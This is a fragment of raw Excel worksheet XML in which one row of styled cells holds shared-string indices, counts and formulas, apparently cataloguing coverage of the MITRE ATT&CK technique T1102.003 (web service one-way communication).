      <c r="RR27" s="184"/>
      <c r="RS27" s="184"/>
      <c r="RT27" s="184"/>
      <c r="RU27" s="184"/>
      <c r="RV27" s="184"/>
      <c r="RW27" s="184"/>
      <c r="RX27" s="184"/>
      <c r="RY27" s="184"/>
      <c r="RZ27" s="184"/>
      <c r="SA27" s="184"/>
      <c r="SB27" s="184"/>
      <c r="SC27" s="184"/>
      <c r="SD27" s="184"/>
      <c r="SE27" s="184"/>
      <c r="SF27" s="184"/>
      <c r="SG27" s="184"/>
      <c r="SH27" s="184"/>
      <c r="SI27" s="184"/>
      <c r="SJ27" s="184"/>
      <c r="SK27" s="184"/>
      <c r="SL27" s="184"/>
      <c r="SM27" s="184"/>
      <c r="SN27" s="184"/>
      <c r="SO27" s="184"/>
      <c r="SP27" s="184"/>
      <c r="SQ27" s="184"/>
      <c r="SR27" s="184"/>
      <c r="SS27" s="184"/>
      <c r="ST27" s="184"/>
      <c r="SU27" s="184"/>
      <c r="SV27" s="184"/>
      <c r="SW27" s="184"/>
      <c r="SX27" s="184"/>
      <c r="SY27" s="184"/>
      <c r="SZ27" s="184"/>
      <c r="TA27" s="184"/>
      <c r="TB27" s="184"/>
      <c r="TC27" s="184"/>
      <c r="TD27" s="184"/>
      <c r="TE27" s="184"/>
      <c r="TF27" s="184"/>
      <c r="TG27" s="184"/>
      <c r="TH27" s="184"/>
      <c r="TI27" s="184"/>
      <c r="TJ27" s="184"/>
      <c r="TK27" s="184"/>
      <c r="TL27" s="184"/>
      <c r="TM27" s="184"/>
      <c r="TN27" s="184"/>
      <c r="TO27" s="184"/>
      <c r="TP27" s="184"/>
      <c r="TQ27" s="184"/>
      <c r="TR27" s="184"/>
      <c r="TS27" s="184"/>
      <c r="TT27" s="184"/>
      <c r="TU27" s="184"/>
      <c r="TV27" s="184"/>
      <c r="TW27" s="184"/>
      <c r="TX27" s="184"/>
      <c r="TY27" s="184"/>
      <c r="TZ27" s="184"/>
      <c r="UA27" s="184"/>
      <c r="UB27" s="184"/>
      <c r="UC27" s="184"/>
      <c r="UD27" s="184"/>
      <c r="UE27" s="184"/>
      <c r="UF27" s="184"/>
      <c r="UG27" s="184"/>
      <c r="UH27" s="184"/>
      <c r="UI27" s="184"/>
      <c r="UJ27" s="184"/>
      <c r="UK27" s="184"/>
      <c r="UL27" s="184"/>
      <c r="UM27" s="184"/>
      <c r="UN27" s="184"/>
      <c r="UO27" s="184"/>
      <c r="UP27" s="184"/>
      <c r="UQ27" s="184"/>
      <c r="UR27" s="184"/>
      <c r="US27" s="184"/>
      <c r="UT27" s="184"/>
      <c r="UU27" s="184"/>
      <c r="UV27" s="184"/>
      <c r="UW27" s="184"/>
      <c r="UX27" s="184"/>
      <c r="UY27" s="184"/>
      <c r="UZ27" s="184"/>
      <c r="VA27" s="184"/>
      <c r="VB27" s="184"/>
      <c r="VC27" s="184"/>
      <c r="VD27" s="184"/>
      <c r="VE27" s="184"/>
      <c r="VF27" s="184"/>
      <c r="VG27" s="184"/>
      <c r="VH27" s="184"/>
      <c r="VI27" s="184"/>
      <c r="VJ27" s="184"/>
      <c r="VK27" s="184"/>
      <c r="VL27" s="184"/>
      <c r="VM27" s="184"/>
      <c r="VN27" s="184"/>
      <c r="VO27" s="184"/>
      <c r="VP27" s="184"/>
      <c r="VQ27" s="184"/>
      <c r="VR27" s="184"/>
      <c r="VS27" s="184"/>
      <c r="VT27" s="184"/>
      <c r="VU27" s="184"/>
      <c r="VV27" s="184"/>
      <c r="VW27" s="184"/>
      <c r="VX27" s="184"/>
      <c r="VY27" s="184"/>
    </row>
    <row r="28" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A28" s="82" t="s">
        <v>5</v>
      </c>
      <c r="B28" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C28" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D28" s="83" t="s">
        <v>58</v>
      </c>
      <c r="E28" s="83">
        <f t="shared" si="2"/>
        <v>22</v>
      </c>
      <c r="F28" s="83" t="s">
        <v>59</v>
      </c>
      <c r="G28" s="94" t="s">
        <v>1003</v>
      </c>
      <c r="H28" s="83" t="s">
        <v>1004</v>
      </c>
      <c r="I28" s="81" t="s">
        <v>1005</v>
      </c>
      <c r="J28" s="85" t="s">
        <v>760</v>
      </c>
      <c r="K28" s="81" t="s">
        <v>1006</v>
      </c>
      <c r="L28" s="81" t="s">
        <v>1007</v>
      </c>
      <c r="M28" s="378" t="s">
        <v>202</v>
      </c>
      <c r="N28" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O28" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P28" s="91"/>
      <c r="Q28" s="379" t="s">
        <v>1008</v>
      </c>
      <c r="R28" s="92" t="s">
        <v>1009</v>
      </c>
      <c r="S28" s="93" t="s">
        <v>787</v>
      </c>
      <c r="T28" s="92" t="s">
        <v>1010</v>
      </c>
      <c r="U28" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V28" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W28" s="96" t="s">
        <v>1011</v>
      </c>
      <c r="X28" s="97" t="s">
        <v>1012</v>
      </c>
      <c r="Y28" s="83" t="s">
        <v>1013</v>
      </c>
      <c r="Z28" s="98" t="s">
        <v>1014</v>
      </c>
      <c r="AA28" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB28" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC28" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD28" s="83"/>
      <c r="AE28" s="83"/>
      <c r="AF28" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG28" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH28" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI28" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ28" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AK28" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL28" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM28" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN28" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO28" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP28" s="385" t="str">
        <f>M28&amp;"-frag"</f>
        <v>T1102.003-Web_service-one_way_communication-frag</v>
      </c>
      <c r="AQ28" s="358">
        <v>2</v>
      </c>
      <c r="AR28" s="100"/>
      <c r="AS28" s="100">
        <v>1</v>
      </c>
      <c r="AT28" s="100">
        <v>1</v>
      </c>
      <c r="AU28" s="100">
        <v>2</v>
      </c>
      <c r="AV28" s="92" t="s">
        <v>991</v>
      </c>
      <c r="AW28" s="100">
        <v>1</v>
      </c>
      <c r="AX28" s="100">
        <v>1</v>
      </c>
      <c r="AY28" s="100">
        <v>1</v>
      </c>
      <c r="AZ28" s="100">
        <v>2</v>
      </c>
      <c r="BA28" s="381"/>
      <c r="BB28" s="101">
        <v>3</v>
      </c>
      <c r="BC28" s="102" t="s">
        <v>1787</v>
      </c>
      <c r="BD28" s="102">
        <v>3</v>
      </c>
      <c r="BE28" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="BF28" s="103">
        <v>3</v>
      </c>
      <c r="BG28" s="104">
        <v>1</v>
      </c>
      <c r="BH28" s="105">
        <v>3</v>
      </c>
      <c r="BI28" s="106" t="s">
        <v>1840</v>
      </c>
      <c r="BJ28" s="497">
        <v>3</v>
      </c>
      <c r="BK28" s="186" t="s">
        <v>1841</v>
      </c>
      <c r="BL28" s="107">
        <v>3</v>
      </c>
      <c r="BM28" s="108">
        <v>1</v>
      </c>
      <c r="BN28" s="109">
        <v>6</v>
      </c>
      <c r="BO28" s="110" t="s">
        <v>1885</v>
      </c>
      <c r="BP28" s="501">
        <v>6</v>
      </c>
      <c r="BQ28" s="187" t="s">
        <v>1886</v>
      </c>
      <c r="BR28" s="111">
        <v>6</v>
      </c>
      <c r="BS28" s="112">
        <v>2</v>
      </c>
      <c r="BT28" s="113">
        <v>17</v>
      </c>
      <c r="BU28" s="114" t="s">
        <v>2953</v>
      </c>
      <c r="BV28" s="503">
        <v>4</v>
      </c>
      <c r="BW28" s="115" t="s">
        <v>2954</v>
      </c>
      <c r="BX28" s="115">
        <v>4</v>
      </c>
      <c r="BY28" s="116">
        <v>2</v>
      </c>
      <c r="BZ28" s="250">
        <v>8</v>
      </c>
      <c r="CA28" s="251" t="s">
        <v>2955</v>
      </c>
      <c r="CB28" s="505">
        <v>6</v>
      </c>
      <c r="CC28" s="254" t="s">
        <v>2956</v>
      </c>
      <c r="CD28" s="252">
        <v>5</v>
      </c>
      <c r="CE28" s="253">
        <v>2</v>
      </c>
      <c r="CF28" s="101">
        <v>25</v>
      </c>
      <c r="CG28" s="102" t="s">
        <v>2957</v>
      </c>
      <c r="CH28" s="102">
        <v>10</v>
      </c>
      <c r="CI28" s="103" t="s">
        <v>2958</v>
      </c>
      <c r="CJ28" s="103">
        <v>9</v>
      </c>
      <c r="CK28" s="104">
        <v>2</v>
      </c>
      <c r="CL28" s="105">
        <v>0</v>
      </c>
      <c r="CM28" s="106">
        <v>0</v>
      </c>
      <c r="CN28" s="497">
        <v>0</v>
      </c>
      <c r="CO28" s="186">
        <v>0</v>
      </c>
      <c r="CP28" s="107">
        <v>0</v>
      </c>
      <c r="CQ28" s="108">
        <v>0</v>
      </c>
      <c r="CR28" s="109">
        <v>0</v>
      </c>
      <c r="CS28" s="110">
        <v>0</v>
      </c>
      <c r="CT28" s="501">
        <v>0</v>
      </c>
      <c r="CU28" s="187">
        <v>0</v>
      </c>
      <c r="CV28" s="111">
        <v>0</v>
      </c>
      <c r="CW28" s="112">
        <v>0</v>
      </c>
      <c r="CX28" s="113">
        <v>6</v>
      </c>
      <c r="CY28" s="114" t="s">
        <v>1885</v>
      </c>
      <c r="CZ28" s="503">
        <v>6</v>
      </c>
      <c r="DA28" s="115" t="s">
        <v>1886</v>
      </c>
      <c r="DB28" s="115">
        <v>6</v>
      </c>
      <c r="DC28" s="116">
        <v>2</v>
      </c>
      <c r="DD28" s="101">
        <v>0</v>
      </c>
      <c r="DE28" s="102">
        <v>0</v>
      </c>
      <c r="DF28" s="102">
        <v>0</v>
      </c>
      <c r="DG28" s="103">
        <v>0</v>
      </c>
      <c r="DH28" s="103">
        <v>0</v>
      </c>
      <c r="DI28" s="104">
        <v>0</v>
      </c>
      <c r="DJ28" s="105">
        <v>3</v>
      </c>
      <c r="DK28" s="106" t="s">
        <v>1840</v>
      </c>
      <c r="DL28" s="497">
        <v>3</v>
      </c>
      <c r="DM28" s="186" t="s">
        <v>1841</v>
      </c>
      <c r="DN28" s="107">
        <v>3</v>
      </c>
      <c r="DO28" s="108">
        <v>1</v>
      </c>
      <c r="DP28" s="109">
        <v>3</v>
      </c>
      <c r="DQ28" s="110" t="s">
        <v>1840</v>
      </c>
      <c r="DR28" s="501">
        <v>3</v>
      </c>
      <c r="DS28" s="187" t="s">
        <v>1841</v>
      </c>
      <c r="DT28" s="111">
        <v>3</v>
      </c>
      <c r="DU28" s="112">
        <v>1</v>
      </c>
      <c r="DV28" s="113">
        <v>14</v>
      </c>
      <c r="DW28" s="114" t="s">
        <v>2959</v>
      </c>
      <c r="DX28" s="503">
        <v>1</v>
      </c>
      <c r="DY28" s="115" t="s">
        <v>1894</v>
      </c>
      <c r="DZ28" s="115">
        <v>1</v>
      </c>
      <c r="EA28" s="116">
        <v>1</v>
      </c>
      <c r="EB28" s="250">
        <v>3</v>
      </c>
      <c r="EC28" s="251" t="s">
        <v>1840</v>
      </c>
      <c r="ED28" s="505">
        <v>3</v>
      </c>
      <c r="EE28" s="254" t="s">
        <v>1841</v>
      </c>
      <c r="EF28" s="252">
        <v>3</v>
      </c>
      <c r="EG28" s="253">
        <v>1</v>
      </c>
      <c r="EH28" s="101">
        <v>17</v>
      </c>
      <c r="EI28" s="102" t="s">
        <v>2960</v>
      </c>
      <c r="EJ28" s="102">
        <v>4</v>
      </c>
      <c r="EK28" s="103" t="s">
        <v>2574</v>
      </c>
      <c r="EL28" s="103">
        <v>4</v>
      </c>
      <c r="EM28" s="104">
        <v>1</v>
      </c>
      <c r="EN28" s="105">
        <v>0</v>
      </c>
      <c r="EO28" s="106">
        <v>0</v>
      </c>
      <c r="EP28" s="497">
        <v>0</v>
      </c>
      <c r="EQ28" s="186">
        <v>0</v>
      </c>
      <c r="ER28" s="107">
        <v>0</v>
      </c>
      <c r="ES28" s="108">
        <v>0</v>
      </c>
      <c r="ET28" s="109">
        <v>0</v>
      </c>
      <c r="EU28" s="110">
        <v>0</v>
      </c>
      <c r="EV28" s="501">
        <v>0</v>
      </c>
      <c r="EW28" s="187">
        <v>0</v>
      </c>
      <c r="EX28" s="111">
        <v>0</v>
      </c>
      <c r="EY28" s="112">
        <v>0</v>
      </c>
      <c r="EZ28" s="113">
        <v>3</v>
      </c>
      <c r="FA28" s="114" t="s">
        <v>1840</v>
      </c>
      <c r="FB28" s="503">
        <v>3</v>
      </c>
      <c r="FC28" s="115" t="s">
        <v>1841</v>
      </c>
      <c r="FD28" s="115">
        <v>3</v>
      </c>
      <c r="FE28" s="116">
        <v>1</v>
      </c>
      <c r="FF28" s="101">
        <v>0</v>
      </c>
      <c r="FG28" s="102">
        <v>0</v>
      </c>
      <c r="FH28" s="102">
        <v>0</v>
      </c>
      <c r="FI28" s="103">
        <v>0</v>
      </c>
      <c r="FJ28" s="103">
        <v>0</v>
      </c>
      <c r="FK28" s="104">
        <v>0</v>
      </c>
      <c r="FL28" s="105">
        <v>0</v>
      </c>
      <c r="FM28" s="106">
        <v>0</v>
      </c>
      <c r="FN28" s="497">
        <v>0</v>
      </c>
      <c r="FO28" s="186">
        <v>0</v>
      </c>
      <c r="FP28" s="107">
        <v>0</v>
      </c>
      <c r="FQ28" s="108">
        <v>0</v>
      </c>
      <c r="FR28" s="109">
        <v>0</v>
      </c>
      <c r="FS28" s="110">
        <v>0</v>
      </c>
      <c r="FT28" s="501">
        <v>0</v>
      </c>
      <c r="FU28" s="187">
        <v>0</v>
      </c>
      <c r="FV28" s="111">
        <v>0</v>
      </c>
      <c r="FW28" s="112">
        <v>0</v>
      </c>
      <c r="FX28" s="113">
        <v>0</v>
      </c>
      <c r="FY28" s="114">
        <v>0</v>
      </c>
      <c r="FZ28" s="503">
        <v>0</v>
      </c>
      <c r="GA28" s="115">
        <v>0</v>
      </c>
      <c r="GB28" s="115">
        <v>0</v>
      </c>
      <c r="GC28" s="116">
        <v>0</v>
      </c>
      <c r="GD28" s="250">
        <v>5</v>
      </c>
      <c r="GE28" s="251" t="s">
        <v>2961</v>
      </c>
      <c r="GF28" s="505">
        <v>3</v>
      </c>
      <c r="GG28" s="254" t="s">
        <v>2557</v>
      </c>
      <c r="GH28" s="252">
        <v>2</v>
      </c>
      <c r="GI28" s="253">
        <v>2</v>
      </c>
      <c r="GJ28" s="101">
        <v>5</v>
      </c>
      <c r="GK28" s="102" t="s">
        <v>2961</v>
      </c>
      <c r="GL28" s="102">
        <v>3</v>
      </c>
      <c r="GM28" s="103" t="s">
        <v>2557</v>
      </c>
      <c r="GN28" s="103">
        <v>2</v>
      </c>
      <c r="GO28" s="104">
        <v>2</v>
      </c>
      <c r="GP28" s="105">
        <v>0</v>
      </c>
      <c r="GQ28" s="106">
        <v>0</v>
      </c>
      <c r="GR28" s="497">
        <v>0</v>
      </c>
      <c r="GS28" s="186">
        <v>0</v>
      </c>
      <c r="GT28" s="107">
        <v>0</v>
      </c>
      <c r="GU28" s="108">
        <v>0</v>
      </c>
      <c r="GV28" s="109">
        <v>0</v>
      </c>
      <c r="GW28" s="110">
        <v>0</v>
      </c>
      <c r="GX28" s="501">
        <v>0</v>
      </c>
      <c r="GY28" s="187">
        <v>0</v>
      </c>
      <c r="GZ28" s="111">
        <v>0</v>
      </c>
      <c r="HA28" s="112">
        <v>0</v>
      </c>
      <c r="HB28" s="113">
        <v>0</v>
      </c>
      <c r="HC28" s="114">
        <v>0</v>
      </c>
      <c r="HD28" s="503">
        <v>0</v>
      </c>
      <c r="HE28" s="115">
        <v>0</v>
      </c>
      <c r="HF28" s="115">
        <v>0</v>
      </c>
      <c r="HG28" s="116">
        <v>0</v>
      </c>
      <c r="HH28" s="101">
        <v>3</v>
      </c>
      <c r="HI28" s="102" t="s">
        <v>1787</v>
      </c>
      <c r="HJ28" s="102">
        <v>3</v>
      </c>
      <c r="HK28" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="HL28" s="103">
        <v>3</v>
      </c>
      <c r="HM28" s="104">
        <v>1</v>
      </c>
      <c r="HN28" s="105">
        <v>0</v>
      </c>
      <c r="HO28" s="106">
        <v>0</v>
      </c>
      <c r="HP28" s="497">
        <v>0</v>
      </c>
      <c r="HQ28" s="186">
        <v>0</v>
      </c>
      <c r="HR28" s="107">
        <v>0</v>
      </c>
      <c r="HS28" s="108">
        <v>0</v>
      </c>
      <c r="HT28" s="109">
        <v>3</v>
      </c>
      <c r="HU28" s="110" t="s">
        <v>1787</v>
      </c>
      <c r="HV28" s="501">
        <v>3</v>
      </c>
      <c r="HW28" s="187" t="s">
        <v>1788</v>
      </c>
      <c r="HX28" s="111">
        <v>3</v>
      </c>
      <c r="HY28" s="112">
        <v>1</v>
      </c>
      <c r="HZ28" s="113">
        <v>3</v>
      </c>
      <c r="IA28" s="114" t="s">
        <v>1787</v>
      </c>
      <c r="IB28" s="503">
        <v>3</v>
      </c>
      <c r="IC28" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="ID28" s="115">
        <v>3</v>
      </c>
      <c r="IE28" s="116">
        <v>1</v>
      </c>
      <c r="IF28" s="250">
        <v>0</v>
      </c>
      <c r="IG28" s="251">
        <v>0</v>
      </c>
      <c r="IH28" s="505">
        <v>0</v>
      </c>
      <c r="II28" s="254">
        <v>0</v>
      </c>
      <c r="IJ28" s="252">
        <v>0</v>
      </c>
      <c r="IK28" s="253">
        <v>0</v>
      </c>
      <c r="IL28" s="101">
        <v>3</v>
      </c>
      <c r="IM28" s="102" t="s">
        <v>1787</v>
      </c>
      <c r="IN28" s="102">
        <v>3</v>
      </c>
      <c r="IO28" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="IP28" s="103">
        <v>3</v>
      </c>
      <c r="IQ28" s="104">
        <v>1</v>
      </c>
      <c r="IR28" s="105">
        <v>0</v>
      </c>
      <c r="IS28" s="106">
        <v>0</v>
      </c>
      <c r="IT28" s="497">
        <v>0</v>
      </c>
      <c r="IU28" s="186">
        <v>0</v>
      </c>
      <c r="IV28" s="107">
        <v>0</v>
      </c>
      <c r="IW28" s="108">
        <v>0</v>
      </c>
      <c r="IX28" s="109">
        <v>0</v>
      </c>
      <c r="IY28" s="110">
        <v>0</v>
      </c>
      <c r="IZ28" s="501">
        <v>0</v>
      </c>
      <c r="JA28" s="187">
        <v>0</v>
      </c>
      <c r="JB28" s="111">
        <v>0</v>
      </c>
      <c r="JC28" s="112">
        <v>0</v>
      </c>
      <c r="JD28" s="113">
        <v>3</v>
      </c>
      <c r="JE28" s="114" t="s">
        <v>1787</v>
      </c>
      <c r="JF28" s="503">
        <v>3</v>
      </c>
      <c r="JG28" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="JH28" s="115">
        <v>3</v>
      </c>
      <c r="JI28" s="116">
        <v>1</v>
      </c>
      <c r="JJ28" s="101">
        <v>0</v>
      </c>
      <c r="JK28" s="102">
        <v>0</v>
      </c>
      <c r="JL28" s="102">
        <v>0</v>
      </c>
      <c r="JM28" s="103">
        <v>0</v>
      </c>
      <c r="JN28" s="103">
        <v>0</v>
      </c>
      <c r="JO28" s="104">
        <v>0</v>
      </c>
      <c r="JP28" s="105">
        <v>0</v>
      </c>
      <c r="JQ28" s="106">
        <v>0</v>
      </c>
      <c r="JR28" s="497">
        <v>0</v>
      </c>
      <c r="JS28" s="186">
        <v>0</v>
      </c>
      <c r="JT28" s="107">
        <v>0</v>
      </c>
      <c r="JU28" s="108">
        <v>0</v>
      </c>
      <c r="JV28" s="109">
        <v>0</v>
      </c>
      <c r="JW28" s="110">
        <v>0</v>
      </c>
      <c r="JX28" s="501">
        <v>0</v>
      </c>
      <c r="JY28" s="187">
        <v>0</v>
      </c>
      <c r="JZ28" s="111">
        <v>0</v>
      </c>
      <c r="KA28" s="112">
        <v>0</v>
      </c>
      <c r="KB28" s="113">
        <v>0</v>
      </c>
      <c r="KC28" s="114">
        <v>0</v>
      </c>
      <c r="KD28" s="503">
        <v>0</v>
      </c>
      <c r="KE28" s="115">
        <v>0</v>
      </c>
      <c r="KF28" s="115">
        <v>0</v>
      </c>
      <c r="KG28" s="116">
        <v>0</v>
      </c>
      <c r="KH28" s="250">
        <v>0</v>
      </c>
      <c r="KI28" s="251">
        <v>0</v>
      </c>
      <c r="KJ28" s="505">
        <v>0</v>
      </c>
      <c r="KK28" s="254">
        <v>0</v>
      </c>
      <c r="KL28" s="252">
        <v>0</v>
      </c>
      <c r="KM28" s="253">
        <v>0</v>
      </c>
      <c r="KN28" s="101">
        <v>0</v>
      </c>
      <c r="KO28" s="102">
        <v>0</v>
      </c>
      <c r="KP28" s="102">
        <v>0</v>
      </c>
      <c r="KQ28" s="103">
        <v>0</v>
      </c>
      <c r="KR28" s="103">
        <v>0</v>
      </c>
      <c r="KS28" s="104">
        <v>0</v>
      </c>
      <c r="KT28" s="105">
        <v>0</v>
      </c>
      <c r="KU28" s="106">
        <v>0</v>
      </c>
      <c r="KV28" s="497">
        <v>0</v>
      </c>
      <c r="KW28" s="186">
        <v>0</v>
      </c>
      <c r="KX28" s="107">
        <v>0</v>
      </c>
      <c r="KY28" s="108">
        <v>0</v>
      </c>
      <c r="KZ28" s="109">
        <v>0</v>
      </c>
      <c r="LA28" s="110">
        <v>0</v>
      </c>
      <c r="LB28" s="501">
        <v>0</v>
      </c>
      <c r="LC28" s="187">
        <v>0</v>
      </c>
      <c r="LD28" s="111">
        <v>0</v>
      </c>
      <c r="LE28" s="112">
        <v>0</v>
      </c>
      <c r="LF28" s="113">
        <v>0</v>
      </c>
      <c r="LG28" s="114">
        <v>0</v>
      </c>
      <c r="LH28" s="503">
        <v>0</v>
      </c>
      <c r="LI28" s="115">
        <v>0</v>
      </c>
      <c r="LJ28" s="115">
        <v>0</v>
      </c>
      <c r="LK28" s="116">
        <v>0</v>
      </c>
      <c r="LL28" s="117">
        <v>6</v>
      </c>
      <c r="LM28" s="507">
        <v>5</v>
      </c>
      <c r="LN28" s="119">
        <v>3</v>
      </c>
      <c r="LO28" s="119">
        <v>2</v>
      </c>
      <c r="LP28" s="119">
        <v>2</v>
      </c>
      <c r="LQ28" s="119">
        <v>2</v>
      </c>
      <c r="LR28" s="119">
        <v>2</v>
      </c>
      <c r="LS28" s="119">
        <v>2</v>
      </c>
      <c r="LT28" s="382"/>
      <c r="LU28" s="117">
        <v>1</v>
      </c>
      <c r="LV28" s="118" t="s">
        <v>4160</v>
      </c>
      <c r="LW28" s="507">
        <v>1</v>
      </c>
      <c r="LX28" s="119" t="s">
        <v>2536</v>
      </c>
      <c r="LY28" s="119">
        <v>1</v>
      </c>
      <c r="LZ28" s="119">
        <v>1</v>
      </c>
      <c r="MA28" s="117">
        <v>1</v>
      </c>
      <c r="MB28" s="118" t="s">
        <v>4192</v>
      </c>
      <c r="MC28" s="507">
        <v>1</v>
      </c>
      <c r="MD28" s="119" t="s">
        <v>2962</v>
      </c>
      <c r="ME28" s="119">
        <v>1</v>
      </c>
      <c r="MF28" s="119">
        <v>1</v>
      </c>
      <c r="MG28" s="117">
        <v>0</v>
      </c>
      <c r="MH28" s="118">
        <v>0</v>
      </c>
      <c r="MI28" s="507">
        <v>0</v>
      </c>
      <c r="MJ28" s="119">
        <v>0</v>
      </c>
      <c r="MK28" s="119">
        <v>0</v>
      </c>
      <c r="ML28" s="119">
        <v>0</v>
      </c>
      <c r="MM28" s="117">
        <v>2</v>
      </c>
      <c r="MN28" s="118" t="s">
        <v>4193</v>
      </c>
      <c r="MO28" s="507">
        <v>1</v>
      </c>
      <c r="MP28" s="119" t="s">
        <v>2537</v>
      </c>
      <c r="MQ28" s="119">
        <v>1</v>
      </c>
      <c r="MR28" s="119">
        <v>1</v>
      </c>
      <c r="MS28" s="117">
        <v>0</v>
      </c>
      <c r="MT28" s="118">
        <v>0</v>
      </c>
      <c r="MU28" s="507">
        <v>0</v>
      </c>
      <c r="MV28" s="119">
        <v>0</v>
      </c>
      <c r="MW28" s="119">
        <v>0</v>
      </c>
      <c r="MX28" s="119">
        <v>0</v>
      </c>
      <c r="MY28" s="117">
        <v>0</v>
      </c>
      <c r="MZ28" s="118">
        <v>0</v>
      </c>
      <c r="NA28" s="507">
        <v>0</v>
      </c>
      <c r="NB28" s="119">
        <v>0</v>
      </c>
      <c r="NC28" s="119">
        <v>0</v>
      </c>
      <c r="ND28" s="119">
        <v>0</v>
      </c>
      <c r="NE28" s="117">
        <v>0</v>
      </c>
      <c r="NF28" s="118">
        <v>0</v>
      </c>
      <c r="NG28" s="507">
        <v>0</v>
      </c>
      <c r="NH28" s="119">
        <v>0</v>
      </c>
      <c r="NI28" s="119">
        <v>0</v>
      </c>
      <c r="NJ28" s="119">
        <v>0</v>
      </c>
      <c r="NK28" s="117">
        <v>0</v>
      </c>
      <c r="NL28" s="118">
        <v>0</v>
      </c>
      <c r="NM28" s="507">
        <v>0</v>
      </c>
      <c r="NN28" s="119">
        <v>0</v>
      </c>
      <c r="NO28" s="119">
        <v>0</v>
      </c>
      <c r="NP28" s="119">
        <v>0</v>
      </c>
      <c r="NQ28" s="117">
        <v>0</v>
      </c>
      <c r="NR28" s="118">
        <v>0</v>
      </c>
      <c r="NS28" s="507">
        <v>0</v>
      </c>
      <c r="NT28" s="119">
        <v>0</v>
      </c>
      <c r="NU28" s="119">
        <v>0</v>
      </c>
      <c r="NV28" s="119">
        <v>0</v>
      </c>
      <c r="NW28" s="117">
        <v>2</v>
      </c>
      <c r="NX28" s="118" t="s">
        <v>4338</v>
      </c>
      <c r="NY28" s="507">
        <v>2</v>
      </c>
      <c r="NZ28" s="119" t="s">
        <v>4194</v>
      </c>
      <c r="OA28" s="119">
        <v>2</v>
      </c>
      <c r="OB28" s="119">
        <v>2</v>
      </c>
      <c r="OC28" s="120">
        <v>6</v>
      </c>
      <c r="OD28" s="120">
        <v>3</v>
      </c>
      <c r="OE28" s="120">
        <v>3</v>
      </c>
      <c r="OF28" s="121">
        <v>2</v>
      </c>
      <c r="OG28" s="120">
        <v>2</v>
      </c>
      <c r="OH28" s="120">
        <v>2</v>
      </c>
      <c r="OI28" s="120">
        <v>2</v>
      </c>
      <c r="OJ28" s="120">
        <v>2</v>
      </c>
      <c r="OK28" s="383"/>
      <c r="OL28" s="120">
        <v>5</v>
      </c>
      <c r="OM28" s="120">
        <v>5</v>
      </c>
      <c r="ON28" s="120">
        <v>2</v>
      </c>
      <c r="OO28" s="195" t="s">
        <v>2963</v>
      </c>
      <c r="OP28" s="195">
        <v>2</v>
      </c>
      <c r="OQ28" s="464">
        <v>2</v>
      </c>
      <c r="OR28" s="120">
        <v>0</v>
      </c>
      <c r="OS28" s="120">
        <v>0</v>
      </c>
      <c r="OT28" s="120">
        <v>0</v>
      </c>
      <c r="OU28" s="195"/>
      <c r="OV28" s="195">
        <v>0</v>
      </c>
      <c r="OW28" s="464">
        <v>0</v>
      </c>
      <c r="OX28" s="120">
        <v>0</v>
      </c>
      <c r="OY28" s="120">
        <v>0</v>
      </c>
      <c r="OZ28" s="120">
        <v>0</v>
      </c>
      <c r="PA28" s="195"/>
      <c r="PB28" s="195">
        <v>0</v>
      </c>
      <c r="PC28" s="464">
        <v>0</v>
      </c>
      <c r="PD28" s="120">
        <v>0</v>
      </c>
      <c r="PE28" s="120">
        <v>0</v>
      </c>
      <c r="PF28" s="120">
        <v>0</v>
      </c>
      <c r="PG28" s="195"/>
      <c r="PH28" s="195">
        <v>0</v>
      </c>
      <c r="PI28" s="464">
        <v>0</v>
      </c>
      <c r="PJ28" s="120">
        <v>1</v>
      </c>
      <c r="PK28" s="120">
        <v>1</v>
      </c>
      <c r="PL28" s="120">
        <v>1</v>
      </c>
      <c r="PM28" s="195" t="s">
        <v>2540</v>
      </c>
      <c r="PN28" s="195">
        <v>1</v>
      </c>
      <c r="PO28" s="464">
        <v>1</v>
      </c>
      <c r="PP28" s="120">
        <v>1</v>
      </c>
      <c r="PQ28" s="120">
        <v>1</v>
      </c>
      <c r="PR28" s="120">
        <v>1</v>
      </c>
      <c r="PS28" s="195" t="s">
        <v>2660</v>
      </c>
      <c r="PT28" s="195">
        <v>1</v>
      </c>
      <c r="PU28" s="464">
        <v>1</v>
      </c>
      <c r="PV28" s="120">
        <v>0</v>
      </c>
      <c r="PW28" s="120">
        <v>0</v>
      </c>
      <c r="PX28" s="120">
        <v>0</v>
      </c>
      <c r="PY28" s="195"/>
      <c r="PZ28" s="195">
        <v>0</v>
      </c>
      <c r="QA28" s="464">
        <v>0</v>
      </c>
      <c r="QB28" s="120">
        <v>0</v>
      </c>
      <c r="QC28" s="120">
        <v>0</v>
      </c>
      <c r="QD28" s="120">
        <v>0</v>
      </c>
      <c r="QE28" s="195"/>
      <c r="QF28" s="195">
        <v>0</v>
      </c>
      <c r="QG28" s="464">
        <v>0</v>
      </c>
      <c r="QH28" s="120">
        <v>5</v>
      </c>
      <c r="QI28" s="120">
        <v>5</v>
      </c>
      <c r="QJ28" s="120">
        <v>1</v>
      </c>
      <c r="QK28" s="195" t="s">
        <v>2542</v>
      </c>
      <c r="QL28" s="195">
        <v>1</v>
      </c>
      <c r="QM28" s="464">
        <v>1</v>
      </c>
      <c r="QN28" s="120">
        <v>0</v>
